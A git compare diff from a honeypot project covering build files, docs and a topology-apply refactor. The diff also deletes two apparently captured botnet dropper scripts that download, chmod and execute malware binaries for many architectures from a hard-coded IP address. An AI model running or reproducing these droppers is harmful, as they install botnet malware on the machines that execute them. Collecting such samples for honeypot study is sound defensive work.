Compare commits
3 Commits
4586e36d63
...
testing
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
b12d46ff9d | ||
|
|
2ce076cd37 | ||
|
|
e8d97281f7 |
19
.gitignore
vendored
19
.gitignore
vendored
@@ -51,22 +51,3 @@ schem
|
||||
|
||||
# pydeps-style dependency graph dumps from local analysis runs.
|
||||
deps.txt
|
||||
|
||||
# Node modules vendored under decnet/canary/ for the obfuscator helper.
|
||||
# The package.json is the source of truth; modules are reinstalled at
|
||||
# build/deploy time.
|
||||
node_modules/
|
||||
package-lock.json
|
||||
|
||||
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
|
||||
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
|
||||
# files alongside ARE committed and exercise the harness in CI.
|
||||
tests/ttp/rule_precision/corpus/*.jsonl
|
||||
tests/ttp/rule_precision/corpus/seed_*.jsonl
|
||||
threatfox-api.json
|
||||
|
||||
# MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
|
||||
enterprise-attack-*.json
|
||||
|
||||
# pytest failure dump files
|
||||
testfail
|
||||
|
||||
219
Makefile
219
Makefile
@@ -1,219 +0,0 @@
|
||||
PYTEST := .311/bin/pytest
|
||||
FAIL_FAST ?= 1
|
||||
ARGS :=
|
||||
|
||||
# addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
|
||||
# Unit suites inherit that; special suites clear it with --override-ini.
|
||||
UNIT_FLAGS := --timeout=30 --timeout-method=thread
|
||||
SEQ_FLAGS := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
|
||||
FUZZ_FLAGS := --override-ini="addopts=-v -x" -n logical -m fuzz \
|
||||
--ignore=tests/api/test_schemathesis.py \
|
||||
--ignore=tests/api/test_schemathesis_agent.py \
|
||||
--ignore=tests/api/test_schemathesis_swarm.py \
|
||||
--ignore=tests/api/test_schemathesis_ttp.py
|
||||
SCHEMA_QUICK ?= 0
|
||||
SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
|
||||
BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
|
||||
|
||||
# ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
|
||||
|
||||
.PHONY: test-core
|
||||
test-core:
|
||||
$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-web
|
||||
test-web:
|
||||
$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-db
|
||||
test-db:
|
||||
$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-bus
|
||||
test-bus:
|
||||
$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-ttp
|
||||
test-ttp:
|
||||
$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-intel
|
||||
test-intel:
|
||||
$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-analysis
|
||||
test-analysis:
|
||||
$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-infra
|
||||
test-infra:
|
||||
$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-fleet
|
||||
test-fleet:
|
||||
$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-cli
|
||||
test-cli:
|
||||
$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-features
|
||||
test-features:
|
||||
$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
# ── Go and React suites ───────────────────────────────────────────────────────
|
||||
|
||||
_GO_MODULES := \
|
||||
decnet/templates/_caddy_modules/decnetfp \
|
||||
decnet/templates/http/_caddy_modules/decnetfp \
|
||||
decnet/templates/https/_caddy_modules/decnetfp
|
||||
|
||||
.PHONY: test-go
|
||||
test-go:
|
||||
@failed=""; \
|
||||
for mod in $(_GO_MODULES); do \
|
||||
echo "=== go test: $$mod ==="; \
|
||||
if (cd "$$mod" && go test ./...); then \
|
||||
echo "[PASS] $$mod"; \
|
||||
else \
|
||||
echo "[FAIL] $$mod"; \
|
||||
failed="$$failed $$mod"; \
|
||||
if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
|
||||
fi; \
|
||||
done; \
|
||||
[ -z "$$failed" ]
|
||||
|
||||
.PHONY: test-react
|
||||
test-react:
|
||||
cd decnet_web && npm run test:run $(ARGS)
|
||||
|
||||
# ── Special suites (sequential, longer timeout) ───────────────────────────────
|
||||
|
||||
.PHONY: test-live
|
||||
test-live:
|
||||
$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-api
|
||||
test-api:
|
||||
$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-stress
|
||||
test-stress:
|
||||
$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-service
|
||||
test-service:
|
||||
$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-fuzz
|
||||
test-fuzz:
|
||||
$(PYTEST) $(FUZZ_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-schema
|
||||
test-schema:
|
||||
SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
|
||||
tests/api/test_schemathesis.py \
|
||||
tests/api/test_schemathesis_agent.py \
|
||||
tests/api/test_schemathesis_swarm.py \
|
||||
tests/api/test_schemathesis_ttp.py \
|
||||
$(SCHEMA_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-bench
|
||||
test-bench:
|
||||
$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-docker
|
||||
test-docker:
|
||||
DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
|
||||
|
||||
# ── Static analysis ───────────────────────────────────────────────────────────
|
||||
|
||||
.PHONY: test-mypy
|
||||
test-mypy:
|
||||
.311/bin/mypy decnet --ignore-missing-imports --no-error-summary
|
||||
|
||||
.PHONY: test-bandit
|
||||
test-bandit:
|
||||
.311/bin/bandit -r decnet -c pyproject.toml
|
||||
|
||||
.PHONY: test-vulture
|
||||
test-vulture:
|
||||
.311/bin/vulture decnet --min-confidence 80
|
||||
|
||||
.PHONY: test-pip-audit
|
||||
test-pip-audit:
|
||||
.311/bin/pip-audit
|
||||
|
||||
# ── Composite: all suites ─────────────────────────────────────────────────────
|
||||
|
||||
_ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
|
||||
go react \
|
||||
live api schema stress service fuzz bench docker \
|
||||
mypy bandit vulture pip-audit
|
||||
|
||||
.PHONY: test-all test
|
||||
test-all test:
|
||||
@failed=""; \
|
||||
for suite in $(_ALL_SUITES); do \
|
||||
echo ""; \
|
||||
echo "══════════════════════════ $$suite ══════════════════════════"; \
|
||||
if $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
|
||||
echo "[PASS] $$suite"; \
|
||||
else \
|
||||
echo "[FAIL] $$suite"; \
|
||||
failed="$$failed $$suite"; \
|
||||
if [ "$(FAIL_FAST)" = "1" ]; then \
|
||||
echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
|
||||
exit 1; \
|
||||
fi; \
|
||||
fi; \
|
||||
done; \
|
||||
if [ -n "$$failed" ]; then \
|
||||
echo ""; \
|
||||
echo "Failed:$$failed"; \
|
||||
exit 1; \
|
||||
fi; \
|
||||
echo ""; \
|
||||
echo "All suites passed."
|
||||
|
||||
.PHONY: help
|
||||
help:
|
||||
@echo "Unit suites (xdist, 30s timeout):"
|
||||
@echo " make test-core tests/core + config + factories + fixtures"
|
||||
@echo " make test-web tests/web + services"
|
||||
@echo " make test-db tests/db + vectorstore"
|
||||
@echo " make test-bus tests/bus + logging + telemetry"
|
||||
@echo " make test-ttp tests/ttp"
|
||||
@echo " make test-intel tests/intel + asn + geoip"
|
||||
@echo " make test-analysis tests/clustering + correlation"
|
||||
@echo " make test-infra tests/agent + collector + sniffer + profiler"
|
||||
@echo " make test-fleet tests/fleet + swarm + topology + orchestrator + deploy + updater"
|
||||
@echo " make test-cli tests/cli + engine + mutator + realism"
|
||||
@echo " make test-features tests/canary + artifacts + webhook + decky_io + prober"
|
||||
@echo ""
|
||||
@echo "Go / React suites:"
|
||||
@echo " make test-go go test ./... in each Caddy module variant"
|
||||
@echo " make test-react vitest run in decnet_web"
|
||||
@echo ""
|
||||
@echo "Special suites (sequential, 120s timeout):"
|
||||
@echo " make test-live tests/live"
|
||||
@echo " make test-api tests/api (schemathesis)"
|
||||
@echo " make test-stress tests/stress"
|
||||
@echo " make test-service tests/service_testing"
|
||||
@echo " make test-schema schemathesis contract tests (-m fuzz, xdist logical)"
|
||||
@echo " make test-schema SCHEMA_QUICK=1 same, capped at 100 examples per test"
|
||||
@echo " make test-fuzz hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
|
||||
@echo " make test-bench tests/perf"
|
||||
@echo " make test-docker tests/docker (needs DECNET_LIVE_DOCKER=1)"
|
||||
@echo ""
|
||||
@echo "Static analysis:"
|
||||
@echo " make test-mypy mypy type check on decnet/"
|
||||
@echo " make test-bandit bandit security scan on decnet/"
|
||||
@echo " make test-vulture vulture dead code scan (>=80% confidence)"
|
||||
@echo " make test-pip-audit pip-audit dependency vulnerability scan"
|
||||
@echo ""
|
||||
@echo "Composites:"
|
||||
@echo " make test-all ALL suites (unit + go + react + live + api + schema + fuzz + bench + stress + docker + static analysis)"
|
||||
@echo " make test-all FAIL_FAST=0 same, report all failures instead of stopping"
|
||||
@echo ""
|
||||
@echo "Passthrough: make test-web ARGS='--lf -s'"
|
||||
@@ -182,7 +182,6 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
|
||||
|
||||
| Slug | Services | OS Fingerprint | Description |
|
||||
|---|---|---|---|
|
||||
| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
|
||||
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
|
||||
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
|
||||
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
|
||||
@@ -273,11 +272,6 @@ List live at any time with `decnet services`.
|
||||
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
|
||||
|
||||
```ini
|
||||
[deaddeck-1]
|
||||
amount=1
|
||||
archetype=deaddeck
|
||||
ssh.password=admin
|
||||
|
||||
[decky-webmail.http]
|
||||
server_header = Apache/2.4.54 (Debian)
|
||||
fake_app = wordpress
|
||||
|
||||
@@ -1,3 +0,0 @@
|
||||
[0] Downloading 'http://31.56.209.39/curl.sh' ...
|
||||
Saving 'curl.sh.1'
|
||||
HTTP response 200 OK [http://31.56.209.39/curl.sh]
|
||||
@@ -1,46 +0,0 @@
|
||||
#!/bin/sh
|
||||
ulimit -n 4096
|
||||
ulimit -n 999999
|
||||
ulimit -v 2097152
|
||||
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
|
||||
rm -rf odin*
|
||||
rm -rf bizy*
|
||||
rm -rf rs*
|
||||
rm -rf *.sh
|
||||
|
||||
#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
|
||||
#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
|
||||
#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
|
||||
#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
|
||||
#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
|
||||
#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
|
||||
#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
|
||||
#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
|
||||
#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
|
||||
#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
|
||||
|
||||
curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
|
||||
curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
|
||||
curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
|
||||
curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
|
||||
curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
|
||||
curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
|
||||
curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
|
||||
curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
|
||||
curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
|
||||
curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
|
||||
curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
|
||||
curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
|
||||
curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
|
||||
|
||||
curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
|
||||
curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
|
||||
curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
|
||||
curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
|
||||
curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
|
||||
curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
|
||||
curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
|
||||
curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
|
||||
curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
|
||||
curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
|
||||
curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
|
||||
@@ -1,3 +0,0 @@
|
||||
wget http://31.56.209.39/wget.sh -o wget.sh
|
||||
|
||||
wget http://31.56.209.39/curl.sh -o curl.sh
|
||||
@@ -1,3 +0,0 @@
|
||||
[0] Downloading 'http://31.56.209.39/wget.sh' ...
|
||||
Saving 'wget.sh.1'
|
||||
HTTP response 200 OK [http://31.56.209.39/wget.sh]
|
||||
@@ -1,46 +0,0 @@
|
||||
#!/bin/sh
|
||||
ulimit -n 4096
|
||||
ulimit -n 999999
|
||||
ulimit -v 2097152
|
||||
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
|
||||
rm -rf odin*
|
||||
rm -rf bizy*
|
||||
rm -rf rs*
|
||||
rm -rf *.sh
|
||||
|
||||
wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
|
||||
wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
|
||||
wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
|
||||
wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
|
||||
wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
|
||||
wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
|
||||
wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
|
||||
wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
|
||||
wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
|
||||
wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
|
||||
|
||||
wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
|
||||
wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
|
||||
wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
|
||||
wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
|
||||
wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
|
||||
wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
|
||||
wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
|
||||
wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
|
||||
wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
|
||||
wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
|
||||
wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
|
||||
wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
|
||||
wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
|
||||
|
||||
wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
|
||||
wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
|
||||
wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
|
||||
wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
|
||||
wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
|
||||
wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
|
||||
wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
|
||||
wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
|
||||
wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
|
||||
wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
|
||||
wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
|
||||
@@ -1,5 +0,0 @@
|
||||
# bait/
|
||||
|
||||
Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries concatenate onto the hardcoded bait baseline (additive to realism-engine output, never replacing).
|
||||
|
||||
JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.
|
||||
BIN
decnet.tar
BIN
decnet.tar
Binary file not shown.
@@ -194,7 +194,7 @@ async def self_destruct() -> None:
|
||||
argv = ["/bin/bash", path]
|
||||
spawn_kwargs = {"start_new_session": True}
|
||||
|
||||
subprocess.Popen( # type: ignore[call-overload] # nosec B603
|
||||
subprocess.Popen( # nosec B603
|
||||
argv,
|
||||
stdin=subprocess.DEVNULL,
|
||||
stdout=subprocess.DEVNULL,
|
||||
|
||||
@@ -121,7 +121,7 @@ def start() -> Optional[asyncio.Task]:
|
||||
return None
|
||||
|
||||
try:
|
||||
from decnet import __version__ as _v # type: ignore[attr-defined]
|
||||
from decnet import __version__ as _v
|
||||
agent_version = _v
|
||||
except Exception:
|
||||
agent_version = "unknown"
|
||||
|
||||
@@ -59,73 +59,6 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
|
||||
return str(tid)
|
||||
|
||||
|
||||
def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
    """Gate an apply on hash integrity and structural validity.

    The canonical hash of ``hydrated`` is recomputed locally and compared
    with ``version_hash``; the topology is then validated.

    Returns:
        The topology id extracted from ``hydrated``.

    Raises:
        HashMismatch: the locally computed hash differs from
            ``version_hash``.
        ValidationError: ``_validation_errors`` reports a non-empty result
            for the issues found by ``_validate_topology``.
    """
    agent_hash = canonical_hash(hydrated)
    if agent_hash != version_hash:
        raise HashMismatch(
            f"master hash {version_hash!r} does not match agent hash "
            f"{agent_hash!r} — refusing to apply"
        )

    found = _validate_topology(hydrated)
    if _validation_errors(found):
        raise ValidationError(found)

    return _topology_id(hydrated)
|
||||
|
||||
|
||||
async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
|
||||
"""Tear down the current topology if it differs from topology_id.
|
||||
|
||||
Master is authoritative — a different pinned topology (fully applied,
|
||||
partially applied, or drifted) is torn down before the new apply proceeds.
|
||||
Refusing with 409 would leave the agent stuck in a state only a human
|
||||
could resolve.
|
||||
"""
|
||||
existing = store.current()
|
||||
if existing is None or existing.topology_id == topology_id:
|
||||
return
|
||||
log.info(
|
||||
"superseding topology %s with %s on master authority",
|
||||
existing.topology_id, topology_id,
|
||||
)
|
||||
try:
|
||||
await teardown(existing.topology_id, store)
|
||||
except Exception as exc: # noqa: BLE001 — we still want to try applying
|
||||
log.warning(
|
||||
"best-effort teardown of superseded topology %s failed: %s",
|
||||
existing.topology_id, exc,
|
||||
)
|
||||
# Hard-clear the store row so the new apply isn't blocked by a
|
||||
# half-torn-down predecessor. Leftover docker objects surface via
|
||||
# the next heartbeat's observed block.
|
||||
store.clear(existing.topology_id)
|
||||
|
||||
|
||||
def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
    """Bring a topology up: bridge networks, compose file, containers.

    This function is synchronous and blocking, so async callers must
    dispatch it through ``asyncio.to_thread``.

    Why ``--always-recreate-deps``: every decky service joins its base's
    network namespace via ``network_mode: container:<base>``, and that
    share is bound when the service starts. If a base is recreated (for
    example because ``ports:`` changed after toggling ``forwards_l3``)
    while compose considers the services unchanged, the services keep a
    stale netns FD pointing at the destroyed base. They then sit in an
    empty namespace with only ``lo`` while external traffic hits a closed
    port on the live base. Recreating dependents together with the base
    is the cheapest way to rule that race out.
    """
    compose_file = _topology_compose_path(topology_id)
    docker_client = docker.from_env()

    # One bridge per LAN; only DMZ LANs are left non-internal.
    for lan in hydrated["lans"]:
        bridge_name = _topology_network_name(topology_id, lan["name"])
        is_internal = not lan["is_dmz"]
        create_bridge_network(
            docker_client,
            bridge_name,
            lan["subnet"],
            internal=is_internal,
        )

    write_topology_compose(hydrated, compose_file)
    _compose_with_retry(
        "up",
        "--build",
        "-d",
        "--always-recreate-deps",
        compose_file=compose_file,
    )
|
||||
|
||||
|
||||
async def apply(
|
||||
hydrated: dict[str, Any],
|
||||
version_hash: str,
|
||||
@@ -140,11 +73,76 @@ async def apply(
|
||||
Any docker / compose error propagates up; the endpoint maps it
|
||||
to 500 and records the message on the store row.
|
||||
"""
|
||||
topology_id = _check_hash_and_validate(hydrated, version_hash)
|
||||
await _teardown_superseded(topology_id, store)
|
||||
await asyncio.to_thread(_materialise, hydrated, topology_id)
|
||||
local_hash = canonical_hash(hydrated)
|
||||
if local_hash != version_hash:
|
||||
raise HashMismatch(
|
||||
f"master hash {version_hash!r} does not match agent hash "
|
||||
f"{local_hash!r} — refusing to apply"
|
||||
)
|
||||
|
||||
issues = _validate_topology(hydrated)
|
||||
if _validation_errors(issues):
|
||||
raise ValidationError(issues)
|
||||
|
||||
topology_id = _topology_id(hydrated)
|
||||
# Master is authoritative. If a different topology is pinned here
|
||||
# — whether it fully applied, only partially applied (failure
|
||||
# marker row + orphan containers), or drifted — teardown first,
|
||||
# then accept the new one. Refusing with 409 would leave the
|
||||
# agent stuck in a state only a human could resolve.
|
||||
existing = store.current()
|
||||
if existing is not None and existing.topology_id != topology_id:
|
||||
log.info(
|
||||
"superseding topology %s with %s on master authority",
|
||||
existing.topology_id, topology_id,
|
||||
)
|
||||
try:
|
||||
await teardown(existing.topology_id, store)
|
||||
except Exception as exc: # noqa: BLE001 — we still want to try applying
|
||||
log.warning(
|
||||
"best-effort teardown of superseded topology %s failed: %s",
|
||||
existing.topology_id, exc,
|
||||
)
|
||||
# Hard-clear the store row so the new apply isn't blocked
|
||||
# by a half-torn-down predecessor. Leftover docker objects
|
||||
# will surface via the next heartbeat's observed block.
|
||||
store.clear(existing.topology_id)
|
||||
|
||||
lans = hydrated["lans"]
|
||||
compose_path = _topology_compose_path(topology_id)
|
||||
client = docker.from_env()
|
||||
|
||||
# Bridges + compose are sync/blocking; hop to a thread so we don't
|
||||
# stall the event loop on a slow docker daemon.
|
||||
def _materialise() -> None:
|
||||
for lan in lans:
|
||||
net_name = _topology_network_name(topology_id, lan["name"])
|
||||
internal = not lan["is_dmz"]
|
||||
create_bridge_network(
|
||||
client, net_name, lan["subnet"], internal=internal
|
||||
)
|
||||
write_topology_compose(hydrated, compose_path)
|
||||
# ``--always-recreate-deps`` keeps service containers' netns shares
|
||||
# fresh: every decky service joins its base's netns via
|
||||
# ``network_mode: container:<base>``, and that share is bound at
|
||||
# service start time. If a base is recreated (e.g. when ``ports:``
|
||||
# changes after toggling ``forwards_l3``) but compose decides the
|
||||
# services are unchanged, the services keep a stale netns FD
|
||||
# pointing at the destroyed base — they end up in an empty
|
||||
# namespace with only ``lo``, and external traffic hits a closed
|
||||
# port on the live base. Forcing dependents to recreate alongside
|
||||
# the base is the cheapest way to make this race impossible.
|
||||
_compose_with_retry(
|
||||
"up", "--build", "-d", "--always-recreate-deps",
|
||||
compose_file=compose_path,
|
||||
)
|
||||
|
||||
await asyncio.to_thread(_materialise)
|
||||
|
||||
store.put(topology_id, version_hash, hydrated)
|
||||
log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
|
||||
log.info(
|
||||
"topology %s applied on agent (%d LANs)", topology_id, len(lans)
|
||||
)
|
||||
|
||||
|
||||
async def teardown(
|
||||
|
||||
@@ -63,7 +63,6 @@ class TopologyStore:
|
||||
# The agent is single-process, so there's no real contention —
|
||||
# sqlite's own connection lock is enough.
|
||||
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
|
||||
self._conn.row_factory = sqlite3.Row
|
||||
self._conn.execute(
|
||||
"CREATE TABLE IF NOT EXISTS applied_topology ("
|
||||
" topology_id TEXT PRIMARY KEY,"
|
||||
@@ -85,11 +84,11 @@ class TopologyStore:
|
||||
if row is None:
|
||||
return None
|
||||
return AppliedRow(
|
||||
topology_id=row["topology_id"],
|
||||
applied_version_hash=row["applied_version_hash"],
|
||||
hydrated=json.loads(row["hydrated_blob_json"]),
|
||||
applied_at=int(row["applied_at"]),
|
||||
last_error=row["last_error"],
|
||||
topology_id=row[0],
|
||||
applied_version_hash=row[1],
|
||||
hydrated=json.loads(row[2]),
|
||||
applied_at=int(row[3]),
|
||||
last_error=row[4],
|
||||
)
|
||||
|
||||
# ---------------------------------------------------------------- writes
|
||||
|
||||
@@ -1 +0,0 @@
|
||||
